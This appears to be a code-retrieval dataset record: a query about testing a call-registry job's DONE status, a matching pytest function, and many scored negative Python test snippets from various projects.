self.assertEqual(imported_endpoint.name, endpoint_data['name'])" ]
[ "0.7932951", "0.7636372", "0.7201175", "0.70154786", "0.69145167", "0.66262203", "0.626443", "0.62300295", "0.61841965", "0.60890883", "0.5921425", "0.58591396", "0.58441097", "0.57225126", "0.57005316", "0.56909", "0.5625876", "0.55742955", "0.5544029", "0.55416805", "0.5526437", "0.5522578", "0.54462385", "0.54407954", "0.5440683", "0.5436101", "0.5434459", "0.5426045", "0.54162467", "0.54031223", "0.5396291", "0.53804284", "0.53417903", "0.5338947", "0.5308122", "0.5294205", "0.5292848", "0.5290397", "0.52743185", "0.5272739", "0.52577144", "0.5252663", "0.52408576", "0.5236346", "0.5233432", "0.5231192", "0.5231192", "0.52310145", "0.52147037", "0.52112246", "0.5200274", "0.5185495", "0.5178097", "0.5175981", "0.51740754", "0.51714957", "0.5162615", "0.51582557", "0.5151847", "0.51455903", "0.5144827", "0.5130889", "0.511182", "0.51055926", "0.5100169", "0.50863314", "0.5086115", "0.5086055", "0.50832653", "0.50821257", "0.5079833", "0.507019", "0.5067746", "0.50630015", "0.50603193", "0.50596887", "0.5053124", "0.50435483", "0.50432", "0.5036978", "0.50343245", "0.5032904", "0.50283754", "0.50231296", "0.50073147", "0.5004912", "0.4999766", "0.49928647", "0.49873102", "0.49841526", "0.49824846", "0.49813762", "0.49811488", "0.49803066", "0.4978842", "0.49672693", "0.49614018", "0.49521956", "0.49495173", "0.49478623" ]
0.784503
1
Test that the response about the registry process contains a 'status' property and that it reports a 'DONE' status for this task. The test uses the start_call_fx fixture
def test_expect_status_property_about_registry_process(client, start_call_fx): url = reverse_lazy('calls:registry-list') response = client.post(url, start_call_fx, content_type='application/json') job_id = response.data.get('job_id') job = client.get(job_id) assert job.data.get('status') == 'DONE'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_expect_data_posted_return_encapsulated_on_message_property_on_response(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n result = job.json()\n\n assert result.get('result')\n\n registry_url = json.loads(result.get('result'))\n\n assert client.get(registry_url.get('url')).status_code == status.HTTP_200_OK", "def test_get_status(self):\n pass", "def test_get_status(self):\n pass", "def test_expect_200Ok_response_GETting_a_job_id_URL(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n task_url = response_data.get('job_id', None)\n\n task_response = client.get(task_url)\n\n assert task_response.status_code == status.HTTP_200_OK", "async def test_health():\n response = health()\n assert response\n assert {'status': 'ok'} == response", "def test_post_a_start_call_and_recover_it_using_a_GET_request(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n post_request = client.post(url,\n start_call_fx,\n content_type='application/json')\n\n assert post_request.status_code == status.HTTP_201_CREATED\n\n job_url = post_request.data.get('job_id')\n\n job_request = client.get(job_url)\n\n result = json.loads(job_request.data.get('result'))\n\n get_request = client.get(result.get('url'))\n\n response = get_request.json()\n\n assert get_request.status_code == status.HTTP_200_OK\n for key, value in start_call_fx.items():\n assert value == response.get(key)", "def test_service_initiated():\n assert \"ready\" in bkt_outcome_unwind.index()", "def test_wait(self, mocker):\n\n tid = 289466\n site = \"mysite\"\n first_response = self.generate_task_dictionary(\n tid, state=\"waiting\", completed=False\n )\n\n responses = [\n {\"json\": first_response},\n {\"json\": self.generate_task_dictionary(tid)},\n ]\n url = (\n \"https://cloudapi.acquia.com/v1/\"\n \"sites/prod:{site}/tasks/{tid}.json\".format(tid=tid, site=site)\n )\n\n mocker.register_uri(\"GET\", url, responses)\n\n task = self.client.site(site).task(tid).wait()\n self.assertEqual(task[\"id\"], tid)\n self.assertEqual(task[\"state\"], \"done\")", "def test_POST_a_call_and_expect_job_id_and_data_posted(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n assert response.status_code == status.HTTP_201_CREATED\n assert 'job_id' in response_data\n\n for item in start_call_fx.items():\n assert item in response_data['data'].items()", "def testTurbiniaWait(self, mock_get_request_status, _):\n mock_api_instance = mock.MagicMock()\n mock_api_instance.create_request = mock_get_request_status\n self.turbinia_processor.requests_api_instance = mock_api_instance\n mock_get_request_status.return_value = self._request_status\n for task, path in self.turbinia_processor.TurbiniaWait(TASK_ID):\n # Check that the task and path are correct for a PlasoParserTask\n if task[\"id\"] == TASK_ID:\n self.assertEqual(task, self._request_status[\"tasks\"][0])\n self.assertEqual(path, TEST_TASK_PATH)\n break", "def test_do_status(get_resource_status: MagicMock, response: execution.ResponseInfo):\n get_resource_status.return_value = response\n bundle = MagicMock()\n bundle.resources.matching.return_value = 
[MagicMock(), MagicMock()]\n action = interface.CommandAction(MagicMock(), [], bundle)\n interface.do_status(action)\n assert get_resource_status.call_count == 2", "def check_status(self):", "async def get_status():", "def test_completed(self):\n return False", "def task_succeed(json_raw):\n rally_report = json.loads(json_raw)\n tasks = rally_report.get('tasks')\n if tasks:\n for task in tasks:\n if task.get('status') != 'finished' or \\\n task.get('pass_sla') is not True:\n return False\n else:\n return False\n return True", "def test_post_a_start_and_stop_registry_and_get_a_call(client, start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1\n assert response.data[0].get('start_timestamp')\n assert response.data[0].get('stop_timestamp')", "def test_check_process_output(self):\n workflow = self.get_workflow(\n \"\"\"file://result <- file://source\n echo test\n \"\"\")\n workflow.pre_check_processes()\n try:\n process = workflow._processes[0]\n create_tuttle_dirs()\n workflow.run_process(process)\n assert False, \"Exception has not been not raised\"\n except ResourceError:\n assert True", "def test_1():\n\tassert api_call().status_code == 200", "def test_16_task_status_completed(self, mock):\r\n with self.flask_app.app_context():\r\n self.register()\r\n self.new_application()\r\n\r\n app = db.session.query(App).first()\r\n # We use a string here to check that it works too\r\n task = Task(app_id=app.id, info={'n_answers': '10'})\r\n db.session.add(task)\r\n db.session.commit()\r\n\r\n res = self.app.get('app/%s/tasks/browse' % (app.short_name),\r\n follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n assert \"Sample App\" in res.data, res.data\r\n assert '0 of 10' in res.data, res.data\r\n err_msg = \"Download button should be disabled\"\r\n assert dom.find(id='nothingtodownload') is not None, err_msg\r\n\r\n for i in range(5):\r\n task_run = TaskRun(app_id=app.id, task_id=1,\r\n info={'answer': 1})\r\n db.session.add(task_run)\r\n db.session.commit()\r\n self.app.get('api/app/%s/newtask' % app.id)\r\n\r\n res = self.app.get('app/%s/tasks/browse' % (app.short_name),\r\n follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n assert \"Sample App\" in res.data, res.data\r\n assert '5 of 10' in res.data, res.data\r\n err_msg = \"Download Partial results button should be shown\"\r\n assert dom.find(id='partialdownload') is not None, err_msg\r\n\r\n for i in range(5):\r\n task_run = TaskRun(app_id=app.id, task_id=1,\r\n info={'answer': 1})\r\n db.session.add(task_run)\r\n db.session.commit()\r\n self.app.get('api/app/%s/newtask' % app.id)\r\n\r\n self.signout()\r\n\r\n app = db.session.query(App).first()\r\n\r\n res = self.app.get('app/%s/tasks/browse' % (app.short_name),\r\n follow_redirects=True)\r\n assert \"Sample App\" in res.data, res.data\r\n msg = 'Task <span class=\"label label-success\">#1</span>'\r\n assert msg in res.data, res.data\r\n assert '10 of 10' in res.data, res.data\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Download Full results button should be shown\"\r\n assert dom.find(id='fulldownload') is not None, err_msg\r\n\r\n app.hidden = 1\r\n db.session.add(app)\r\n db.session.commit()\r\n res = 
self.app.get('app/%s/tasks/browse' % (app.short_name),\r\n follow_redirects=True)\r\n assert res.status_code == 403, res.status_code\r\n\r\n self.create()\r\n self.signin(email=Fixtures.email_addr2, password=Fixtures.password)\r\n res = self.app.get('app/%s/tasks/browse' % (app.short_name),\r\n follow_redirects=True)\r\n assert res.status_code == 403, res.status_code", "def test_wait_for_dispatched_statuses(self):\n msg_helper = MessageHelper()\n worker_helper = WorkerHelper()\n d = worker_helper.wait_for_dispatched_statuses(1, 'fooconn')\n self.assertNoResult(d)\n\n msg = msg_helper.make_status(\n status='down',\n component='foo',\n type='bar',\n message='baz')\n\n yield self._add_to_dispatched(\n worker_helper.broker, 'fooconn.status', msg, kick=True)\n dispatched = success_result_of(d)\n self.assertEqual(dispatched, [msg])", "def test_is_running(self, mock_call):\n\t\tmock_call.return_value = False \n\t\tdevice = Device(1, \"testDevice\", \"testDesc\", \"pump\", 1)\n\t\tdm = DeviceManager()\n\t\tresponse = dm.isRunning(device) \n\t\tself.assertEqual(response, False)", "def test_do_status(config, mocker, path_map_mock):\n logger_mock = mocker.MagicMock()\n p = Unpacker(config, logger_mock)\n assert p._do_status() == {}", "def task_status():\n pass", "def check_fabric_is_alive(fabric):\n seq = get_random_sequence()\n msg = eptMsg(MSG_TYPE.GET_FABRIC_STATUS, seq=seq, data={\"fabric\":fabric})\n #logger.debug(\"get fabric status (seq:0x%x) fabric: %s\", seq, fabric)\n redis = get_redis()\n p = redis.pubsub(ignore_subscribe_messages=True)\n p.subscribe(MANAGER_CTRL_RESPONSE_CHANNEL)\n redis.publish(MANAGER_CTRL_CHANNEL, msg.jsonify())\n start_ts = time.time()\n timeout = AppStatus.MANAGER_STATUS_BRIEF_TIMEOUT\n try:\n while start_ts + timeout > time.time():\n data = p.get_message(timeout=0.5)\n if data is not None:\n channel = data[\"channel\"]\n if channel == MANAGER_CTRL_RESPONSE_CHANNEL:\n msg = eptMsg.parse(data[\"data\"]) \n if msg.msg_type == MSG_TYPE.FABRIC_STATUS:\n # validate this is the addr and sequence number our user requested\n if msg.seq == seq and \"fabric\" in msg.data and \\\n msg.data[\"fabric\"] == fabric:\n #logger.debug(\"fabric status (0x%x) alive:%r\",seq,msg.data[\"alive\"])\n if msg.data[\"alive\"]: \n return True\n else:\n return False\n else:\n logger.debug(\"rx seq/fabric (0x%x/%s), expected (0x%x/%s)\",\n msg.seq, msg.data.get(\"fabric\", \"\"), seq, fabric)\n except Exception as e:\n logger.debug(\"Traceback:\\n%s\", traceback.format_exc())\n logger.debug(\"error: %s\", e)\n finally:\n if redis is not None and hasattr(redis, \"connection_pool\"):\n redis.connection_pool.disconnect()\n logger.warn(\"no manager response within timeout(%s sec)\", timeout)\n return False", "def test_status(self):\n with DockerHost('host', dind=False, start_calico=False) as host:\n host.calicoctl(\"status\")", "def get_status() -> None:\n assert scraper.get_status() == True", "def test_status(self):\n\n url = '/%s/jobs/?status=RUNNING' % self.api\n response = self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n self.assertEqual(len(result['results']), 1)\n self.assertEqual(result['results'][0]['job_type']['id'], self.job1.job_type.id)", "def done(self):\n return self._info['status'] == 'DONE'", "def verify_get_response(self, status):\n validate(status, STATUS)\n self.assertTrue(status['database_connection']['connected'])\n self.assertTrue(status['redis_connection']['connected'])\n 
self.assertEqual(status['missing_workers'], [])\n self.assertNotEqual(status['online_workers'], [])\n self.assertNotEqual(status['versions'], [])", "async def run_check_service(call):\r\n result = await run_check(str(hass.config.path()))\r\n hass.components.persistent_notification.async_create(\r\n result, \"Configuration Check Result\", NOTIFYID\r\n )\r\n if result == \"\\nConfiguration is OK!\\n\":\r\n finish_service = call.data.get(\"service\")\r\n finish_service_data = call.data.get(\"service_data\", {})\r\n if finish_service is not None:\r\n domain = finish_service.split(\".\")[0]\r\n service = finish_service.split(\".\")[1]\r\n await hass.services.async_call(domain, service, finish_service_data)", "def run(self):\r\n logging.info(\"Now excecuting test step {}\".format(self.stepname))\r\n try:\r\n response = eval(\"requests.{}('{}',params={})\".format(self.verb, self.url, self.payload))\r\n return response, True\r\n\r\n except requests.exceptions.RequestException as e:\r\n logging.warn(\"test {} failed\".format(self.stepname))\r\n \r\n return None, False", "def test_sequence_done(self):\n self.t(\"1,2 done\")\n code, out, err = self.t(\"_get 1.status 2.status\")\n self.assertEqual(\"completed completed\\n\", out)", "def test_check_status(mock_send_message):\n A1sim.check_status(BASE_URL)\n mock_send_message.assert_called_once_with('GET',\n 'Get ric status',\n (f\"{BASE_URL}\"))", "async def run(self):\n current_status = \"Init\"\n while self.expected_status != current_status:\n await asyncio.sleep(1)\n async with aiohttp.ClientSession() as session:\n async with session.get(self.url) as response:\n api_call_result = await response.json()\n current_status = api_call_result[\"status\"]\n \n # Send our single event and then we're done\n yield TriggerEvent(api_call_result)", "def test_ping(self):\n\n # Access the service status page, which starts a delayed\n # asynchronous task\n response = self.client.get(self.ping_url)\n\n # HTTP response should be successful\n assert response.status_code == 200\n\n # Expect to get a JSON-serialized dict with\n # task and time information\n result_dict = json.loads(response.content.decode('utf-8'))\n\n # Was it successful?\n assert result_dict['success']\n\n # We should get a \"pong\" message back\n assert result_dict['value'] == 'pong'\n\n # We don't know the other dict values exactly,\n # but we can assert that they take the right form\n assert isinstance(result_dict['task_id'], str)\n assert isinstance(result_dict['time'], float)\n assert result_dict['time'] > 0.0", "def test_completed():\n assert complete == 1\n assert errorflag == 0", "def test_task(self, mocker):\n\n tid = 289466\n site = \"mysite\"\n json = self.generate_task_dictionary(tid, state=\"error\")\n url = (\n \"https://cloudapi.acquia.com/v1/\"\n \"sites/prod:{site}/tasks/{tid}.json\".format(tid=tid, site=site)\n )\n\n mocker.register_uri(\"GET\", url, json=json)\n\n task = self.client.site(site).task(tid)\n self.assertEqual(task[\"id\"], tid)\n self.assertEqual(task[\"state\"], \"error\")", "def custom_wait_for_completion(task_description, output):\n state = 'UNSUBMITTED'\n while not (state == 'COMPLETED' or state =='FAILED'):\n output.add_live_msg(ms.STATUS.format(state))\n time.sleep(5)\n \n #search for the task in task_list\n for task in task_description:\n current_task = gs.isTask(task)\n if current_task:\n state = current_task.state\n if state == 'RUNNING' or state == 'FAILED': \n break\n \n return state", "def test_service_status(self, api_instance):\n params = 
api_instance.get_service_status()\n # Only key we care about here is GetServiceStatus\n assert params[\"Action\"] == \"GetServiceStatus\"", "async def test_command_status(aresponses):\n aresponses.add(\n MATCH_HOST,\n \"/api/command/368630\",\n \"GET\",\n aresponses.Response(\n status=200,\n headers={\"Content-Type\": \"application/json\"},\n text=load_fixture(\"command-id.json\"),\n ),\n )\n\n async with ClientSession() as session:\n client = Sonarr(HOST, API_KEY, session=session)\n response = await client.command_status(368630)\n\n assert response\n assert isinstance(response, models.CommandItem)", "def test_successful(self):\n\n url = '/%s/job-types/running/' % self.api\n response = self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n self.assertEqual(len(result['results']), 1)\n self.assertEqual(result['results'][0]['job_type']['name'], self.job.job_type.name)\n self.assertEqual(result['results'][0]['count'], 1)\n self.assertIsNotNone(result['results'][0]['longest_running'])", "def processTask(self):\n #Util.set_color(Util.FOREGROUND_YELLOW | Util.FOREGROUND_INTENSITY)\n #logging.info(\"cmd : %s\", self.ExecutionTask.get_cmd())\n #logging.info(\"param : %s\", self.ExecutionTask.get_param())\n #logging.info(\"ret : %s\", str(self.ExecutionTask.get_ret()))\n #logging.info(\"ipport : %s\", self.ExecutionTask.get_ipport())\n #Util.set_color(Util.FOREGROUND_WHITE)\n\n ##############################################################\n # Process for any commands without received messages.....\n ##############################################################\n if self.ExecutionTask.get_cmd() == 'PASS' or self.ExecutionTask.get_cmd() == 'FAIL':\n logging.debug(\"result is %s\", self.ExecutionTask.get_cmd())\n self.setStatus('STOP')\n self.setTestResult(self.ExecutionTask.get_cmd())\n return\n\n if self.ExecutionTask.get_cmd() == 'r_info':\n rinfo_result = self.ExecutionTask.get_param().split('!')\n\n if len(rinfo_result) > 1:\n msg = rinfo_result[1]\n logging.debug(\"%s\", msg)\n\n self.setStatus('STOP')\n self.setTestResult(rinfo_result[0])\n return\n\n if self.ExecutionTask.get_cmd() == 'ResultCheck':\n time.sleep(5)\n self.process_ResultCheck()\n return\n\n if self.ExecutionTask.get_cmd() == 'CheckThroughput':\n time.sleep(5)\n throughputChk = StreamHandler(self.test_mngr_initr)\n chk_result = throughputChk.processStreamResults(self.ExecutionTask.get_param())\n self.setCheckResult(chk_result)\n #if 'FAIL' in chk_result:\n # self.setStatus('STOP')\n return\n\n if self.ExecutionTask.get_cmd() == 'config_multi_subresults':\n self.process_config_multi_subresults()\n return\n\n ##############################################################\n # Process for any commands with received messages......\n ##############################################################\n status = \"\"\n retDict = self.ExecutionTask.get_ret()\n recvStr = \"\"\n if self.ExecutionTask.recv:\n recvStr = self.ExecutionTask.recv.rstrip('\\r\\n')\n #print \"recv : \" + recvStr\n \n if GlobalConfigFiles.curr_prog_name == \"WMMPS\" and \"sniffer_control_subtask\" in self.ExecutionTask.get_cmd():\n logging.debug('In WMMPS, before parsing the recvStr: %s' % recvStr)\n lines = re.split('\\n', recvStr)\n for line in lines:\n if re.search(\"RESULT\", line, re.I):\n if \"FAIL\" in line:\n self.setStatus('STOP')\n self.setTestResult('FAIL')\n logging.debug('set test result to FAIL')\n return\n if \"PASS\" in line:\n 
self.setTestResult('PASS')\n logging.debug('set test result to Pass')\n return\n return\n \n stitems = recvStr.split(',') \n if len(stitems) < 2:\n #logging.debug(\"Bypassing this cmd..\")\n return\n\n status = stitems[1]\n iDNB = TestScriptSymbolTable.get_value_from_sym_tab(\"iDNB\", TestScriptSymbolTable.test_script_sym_tab)\n iINV = TestScriptSymbolTable.get_value_from_sym_tab(\"iINV\", TestScriptSymbolTable.test_script_sym_tab) \n \n if iINV is None:\n iINV = 0\n \n if 'ERROR' in recvStr or 'INVALID' in recvStr and (iDNB == 0 or iDNB is None) and (iINV == 0 or iINV is None):\n #error case...\n logging.debug(\"Return ERROR or INVALID---> STOP process \")\n self.setStatus('STOP')\n self.setTestResult('FAIL')\n elif status != 'COMPLETE' and iDNB == 0 and iINV == 0:\n #incomplete case...(running?)\n logging.debug(\"Command %s not completed\", self.ExecutionTask.get_cmd())\n else:\n displayname = \"\"\n for tbd in self.test_mngr_initr.test_prog_mngr.test_prog.testbed_dev_list:\n if tbd.ctrlipaddr == self.ExecutionTask.get_ipport():\n displayname = tbd.displayname\n break\n \n if \"FAIL\" in recvStr and (iINV == 0 or iINV is None):\n if \"SNIFFER\" in displayname or \"sniffer\" in self.ExecutionTask.get_cmd():\n logging.info(\"Test Case Criteria Failure - Command returned FAIL\")\n self.setStatus('STOP')\n self.setTestResult('FAIL')\n\n elif self.ExecutionTask.get_cmd() == 'device_get_info':\n try:\n if displayname == '':\n self.tmsPacket.setDutDeviceInfo(recvStr)\n else:\n self.tmsPacket.setTestbedInfo(displayname, recvStr)\n\n #for validation\n self.setValidationInfo(displayname, recvStr)\n\n except OSError:\n logging.debug(\"exception -- device_get_info capi call\")\n elif self.ExecutionTask.get_cmd() == 'ca_get_version':\n self.setValidationInfo(displayname, recvStr)\n\n elif self.ExecutionTask.get_cmd() == 'sniffer_get_info':\n self.setValidationInfo('sniffer', recvStr)\n\n elif self.ExecutionTask.get_cmd() == 'sta_associate':\n time.sleep(10)\n\n if len(stitems) > 2:\n retParam = self.ExecutionTask.get_param().split(',')\n streamFlag = \"\"\n if len(retParam) > 4:\n streamFlag = retParam[3]\n\n if stitems[2] == 'streamID':\n streamHndler = StreamHandler(self.test_mngr_initr)\n logging.debug(\"stream config - streamID : %s\", stitems[3])\n if streamFlag == 'send':\n logging.debug(\"traffic config - send : streamInfo append\")\n streamPacket = streamInfo(\"%s\" % (stitems[3]), self.ExecutionTask.get_ipport(), -1, 'send',\n retParam[15], retParam[17], streamHndler.running_phase, streamHndler.RTPCount)\n streamHndler.add_streamInfo(streamPacket)\n streamHndler.RTPCount = streamHndler.RTPCount + 1\n\n elif streamFlag == 'receive':\n logging.debug(\"traffic config - receive : streamInfo append\")\n streamPacket = streamInfo(\"%s\" % (stitems[3]), self.ExecutionTask.get_ipport(), -1, 'receive',\n -1, -1, streamHndler.running_phase, -1)\n streamHndler.add_streamInfo(streamPacket)\n\n else:\n logging.debug(\"traffic config - else : \")\n\n\n\n if retParam[1] == 'Multicast':\n logging.debug(\"----MULTICAST----\")\n streamHndler.multicast = 1\n\n if self.ExecutionTask.get_cmd() != \"traffic_agent_send\":\n ret_val = \"%s\" %(stitems[3].strip())\n logging.debug(\"traffic config - ret_val : %s\", ret_val)\n setRetVal(getRetKey(retDict), ret_val)\n\n elif stitems[2].lower() == 'interfacetype':\n ret_val = (\"%s\" %(stitems[5]))\n setRetVal(getRetKey(retDict), ret_val)\n\n elif stitems[2].lower() == 'interfaceid':\n ret_val = stitems[3].split('_')[0]\n setRetVal(getRetKey(retDict), ret_val)\n\n elif 
self.ExecutionTask.get_cmd() == 'traffic_stop_ping':\n\n keyVal = retParam[1]\n #\"%s;%s\"%(retParam[1], self.ExecutionTask.get_ipport())\n setRetVal(keyVal, stitems[5])\n #print(\"%s = %s\" % (retParam[1], stitems[5]))\n pinginternalchk = TestScriptSymbolTable.get_value_from_sym_tab(\"PingInternalChk\", TestScriptSymbolTable.test_script_sym_tab)\n temp_key = getRetKey(self.ExecutionTask.get_ret())\n \n if \"$\" in temp_key:\n sent_reply = temp_key.split(',')\n #print \"SLIM==> ping result save...\"\n #print sent_reply[0]\n #print sent_reply[1]\n setRetVal(sent_reply[0], stitems[3])\n setRetVal(sent_reply[1], stitems[5]) \n\n setRetVal(\"$pingResp\", stitems[5])\n if pinginternalchk == '0':\n logging.debug(\"Ping Internal Check\")\n \n elif stitems[5] == '0':\n logging.debug (\"Test Case Criteria Failure - NO IP Connection -- Aborting the test\")\n self.setStatus('STOP')\n self.setTestResult('FAIL')\n else:\n if stitems[5] == '0':\n logging.debug (\"Test Case Criteria Failure - NO IP Connection -- Aborting the test\")\n self.setStatus('STOP')\n self.setTestResult('FAIL')\n else:\n if len(retDict) > 0:\n tempKey = getRetKey(retDict)\n temp_val = tempKey.split(',')\n count = 0\n item_len = len(stitems)\n for i in temp_val:\n if item_len > count + 3:\n setRetVal(i, stitems[3+count])\n count = count + 2\n\n if self.__status == 'STOP':\n logging.debug(\"generate final result if task stops.\")\n #self.generateFinalResult()\n else:\n pass\n #logging.debug(\"Continue---\")\n return", "async def check_health():\n return {\"healthy\": True}", "def status(ABC) -> bool:", "def test_post_a_start_and_stop_registry_and_get_a_call_using_url(client,\n start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-detail', kwargs={'call_id': 1})\n\n response = client.get(get_url)\n\n assert response.data.get('start_timestamp')\n assert response.data.get('stop_timestamp')", "def check_health(self):\n return defer.succeed(True)", "def test_use_exit_status(self): # suppress(no-self-use)\n subprocess.call.return_value = 1\n GreenTestCommand(Distribution()).run()\n sys.exit.assert_called_with(1)", "def waitUntilSuccess():", "def v2_runner_on_ok(self, result, **kwargs):\n host = result._host\n task = result._task\n output = result._result\n if result._result.get('changed', False):\n status = 'changed'\n else:\n status = 'ok'\n self.results.append({\"host\": host.name, \"action\":task.action, \"status\":status, \"output\": output})", "def test_start(self):\n\n message = {\"method\": \"start\",\n \"params\": {\"elem\": self.container_to_run}}\n response = yield self._get_response(message)\n\n self.assertIsInstance(response, dict)\n self.assertEqual(response[\"method\"], \"start\")\n self.assertIsInstance(response[\"result\"], list)\n\n container_name = \"/\" + self.container_to_run\n\n containers = {i[0]: i[1] for i in response[\"result\"]}\n self.assertIn(container_name, containers.keys(),\n \"Container not found\")\n\n find_up_status = containers[container_name].lower().find(\"up\")\n\n self.assertEqual(find_up_status, 0, \"Container is not running\")", "def is_successful(self):\n for item in self.summary:\n if item['task_status'] is False:\n return testcase.TestCase.EX_TESTCASE_FAILED\n\n return super().is_successful()", "def status_check():\n return 
{\"status\": \"OK\"}", "def process_ResultCheck(self):\n try:\n cmd = self.ExecutionTask.get_param().split(',')\n logging.debug(\"%s-%s-%s-%s-%s\" % ( TestScriptSymbolTable.get_value_from_sym_tab(cmd[0], TestScriptSymbolTable.test_script_sym_tab),cmd[0], cmd[1], cmd[2], cmd[3]))\n\n checkval = cmd[0].split('!') \n \n cval = TestScriptSymbolTable.get_value_from_sym_tab(checkval[1], TestScriptSymbolTable.capi_cmd_ret_sym_tab)\n\n if int(cval) >= int(cmd[1]):\n result = cmd[2]\n else:\n result = cmd[3]\n\n logging.info(\"\\nRESULT CHECK---> %15s\", result) \n self.setTestResult(result)\n \n #if result == 'FAIL':\n if 'FAIL' in result:\n self.setStatus('STOP')\n self.setTestResult('FAIL')\n except OSError:\n logging.info(\"\\nException - ResultCheck\")", "def test_ping(self):\r\n\r\n # Access the service status page, which starts a delayed\r\n # asynchronous task\r\n response = self.client.get(self.ping_url)\r\n\r\n # HTTP response should be successful\r\n self.assertEqual(response.status_code, 200)\r\n\r\n # Expect to get a JSON-serialized dict with\r\n # task and time information\r\n result_dict = json.loads(response.content)\r\n\r\n # Was it successful?\r\n self.assertTrue(result_dict['success'])\r\n\r\n # We should get a \"pong\" message back\r\n self.assertEqual(result_dict['value'], \"pong\")\r\n\r\n # We don't know the other dict values exactly,\r\n # but we can assert that they take the right form\r\n self.assertIsInstance(result_dict['task_id'], unicode)\r\n self.assertIsInstance(result_dict['time'], float)\r\n self.assertTrue(result_dict['time'] > 0.0)", "def status_check(task_id):\n logger.info(f\"Checking task status for {task_id}\")\n task = Task.objects.get(kf_id=task_id)\n task.status_check()", "def is_success(self):\n succ = self.env._check_success()\n if isinstance(succ, dict):\n assert \"task\" in succ\n return succ\n return { \"task\" : succ }", "def test_18_task_status_wip(self, mock):\r\n with self.flask_app.app_context():\r\n self.register()\r\n self.new_application()\r\n\r\n app = db.session.query(App).first()\r\n task = Task(app_id=app.id, info={'n_answers': 10})\r\n db.session.add(task)\r\n db.session.commit()\r\n self.signout()\r\n\r\n app = db.session.query(App).first()\r\n\r\n res = self.app.get('app/%s/tasks/browse' % (app.short_name),\r\n follow_redirects=True)\r\n assert \"Sample App\" in res.data, res.data\r\n msg = 'Task <span class=\"label label-info\">#1</span>'\r\n assert msg in res.data, res.data\r\n assert '0 of 10' in res.data, res.data\r\n\r\n # For a non existing page\r\n res = self.app.get('app/%s/tasks/browse/5000' % (app.short_name),\r\n follow_redirects=True)\r\n assert res.status_code == 404, res.status_code", "def test_execute_status(self):\n # Setup params\n n_slots = 3\n status_cmd = \"status\"\n\n # Prepare n number of empty slots\n self.prepare_cars(n_slots)\n\n # Verify command is able to execute without errors\n self.controller.execute(status_cmd)", "def test_get_start_true(self):\n\n tt = TemperatureTracker()\n tt.start()\n self.assertIsNotNone(tt.get_start())", "def test_get_status(self):\n response = self.client.open(\n '/v1/status',\n method='GET')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def check_completion(self):\n\n time.sleep(3)\n while self.status == 0:\n pass", "def test_log_success(self, mock_info):\n\n with utils.log_activity(\"for test\"):\n pass\n\n mock_info.assert_any_call(\"[jaxline] %s starting...\", \"for test\")\n mock_info.assert_any_call(\"[jaxline] %s finished.\", \"for 
test\")", "def is_call_waiting(self) -> bool:", "def checkRunning(procname):\n return procdata.checkRunning(procname)", "def testGetPortStatus(self):\n self.ports.get_port_status(file_name = 'get_port_status.xml', port_ids = portsDict['port_ids'], port_status = portsDict['port_status'])", "def test_check_exit_status(self):\n run_dir_success = 'data/nanopore_data/run4/done_demuxing/20200104_1412_MN19414_AAU644_68125dc2'\n success_run = MinIONqc(run_dir_success, None, None)\n self.assertTrue(success_run.check_exit_status('data/nanopore_data/run4/done_demuxing/20200104_1412_MN19414_AAU644_68125dc2/.exitcode_for_nanoseq'))\n run_dir_fail = 'data/nanopore_data/run8/demux_failed/20200108_1412_MN19414_AAU648_68125dc2'\n fail_run = MinIONqc(run_dir_fail, None, None)\n self.assertFalse(fail_run.check_exit_status('data/nanopore_data/run8/demux_failed/20200108_1412_MN19414_AAU648_68125dc2/.exitcode_for_nanoseq'))", "def _has_run(self, opt: dict, status: Union[List[str], str]):\n if isinstance(status, str):\n status = [status]\n\n for item in self._query_by_dict(opt):\n if item.get('status') in status:\n return True\n return False", "async def test_health_check(client: AsyncClient):\n\n response = await client.get(f\"/health-check\")\n assert response.status_code == 200\n\n data = response.json()\n assert data[\"service\"][\"status\"] == \"healthy\"\n assert data[\"service\"][\"error\"] is None\n assert data[\"database\"][\"status\"] == \"healthy\"\n assert data[\"database\"][\"error\"] is None", "def mark_completed(self,status):\r\n if status == \"r\":\r\n self.status = \"c\"#It is to test the mark complete function in the test_book.py, otherwise this program works fine in the main.py\r\n return True\r\n elif status == \"c\":\r\n return False", "def test_check_freq_complete(self):\n self.assertEqual(check_freq(self.jobset1), 'completed')", "def test_check_sms_campaign_pendingcall(self):\n result = check_sms_campaign_pendingcall.delay(1)\n self.assertEqual(result.successful(), True)", "def check_result(self, result):\n self.log.info(\"--check_result, result= %s\", result)\n if result[0]['exit_status'] != 0:\n self.fail(\"##Error detected from check_result\")\n else:\n self.log.info(\"--check_result passed\")", "def test_check_status(self):\n post_json = {\"submission_id\": self.status_check_submission_id}\n # Populating error info before calling route to avoid changing last update time\n\n with create_app().app_context():\n sess = GlobalDB.db().session\n populate_submission_error_info(self.status_check_submission_id)\n\n response = self.app.post_json(\"/v1/check_status/\", 